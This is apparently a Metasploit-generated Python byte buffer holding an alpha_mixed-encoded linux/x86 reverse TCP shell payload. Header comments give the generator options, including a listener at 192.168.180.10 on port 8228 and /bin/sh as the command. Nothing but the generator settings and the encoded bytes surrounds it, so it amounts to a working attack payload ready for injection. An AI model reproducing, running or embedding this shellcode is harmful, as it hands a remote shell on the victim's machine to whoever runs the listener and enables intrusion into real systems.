# linux/x86/shell_reverse_tcp - 198 bytes
# https://metasploit.com/
# Encoder: x86/alpha_mixed
# VERBOSE=false, LHOST=192.168.180.10, LPORT=8228, 
# ReverseAllowProxy=false, ReverseListenerThreaded=false, 
# StagerRetryCount=10, StagerRetryWait=5, PrependFork=false, 
# PrependSetresuid=false, PrependSetreuid=false, 
# PrependSetuid=false, PrependSetresgid=false, 
# PrependSetregid=false, PrependSetgid=false, 
# PrependChrootBreak=false, AppendExit=false, 
# MeterpreterDebugLevel=0, RemoteMeterpreterDebugFile=, 
# CreateSession=true, AutoVerifySession=true, CMD=/bin/sh
buf =  b""
buf += b"\x89\xe2\xdb\xd3\xd9\x72\xf4\x58\x50\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x54\x71\x49\x4b\x6a"
buf += b"\x57\x4b\x53\x53\x63\x73\x73\x36\x33\x42\x4a\x76\x62"
buf += b"\x4e\x69\x39\x71\x4e\x50\x72\x46\x5a\x6d\x4b\x30\x6a"
buf += b"\x33\x42\x79\x4e\x50\x75\x6f\x48\x4d\x4f\x70\x51\x59"
buf += b"\x63\x49\x4c\x39\x61\x78\x4b\x70\x69\x38\x48\x34\x34"
buf += b"\x4a\x70\x68\x67\x72\x33\x30\x57\x50\x46\x44\x4e\x69"
buf += b"\x58\x61\x6e\x50\x52\x46\x32\x70\x66\x31\x31\x43\x6d"
buf += b"\x63\x47\x73\x4e\x69\x6d\x31\x4a\x6d\x6f\x70\x61\x42"
buf += b"\x33\x58\x42\x4e\x66\x4f\x61\x63\x75\x38\x72\x48\x64"
buf += b"\x6f\x74\x6f\x32\x42\x53\x59\x4f\x79\x38\x63\x51\x42"
buf += b"\x36\x33\x4d\x59\x6b\x51\x4c\x70\x44\x4b\x38\x4d\x4d"
buf += b"\x50\x41\x41"
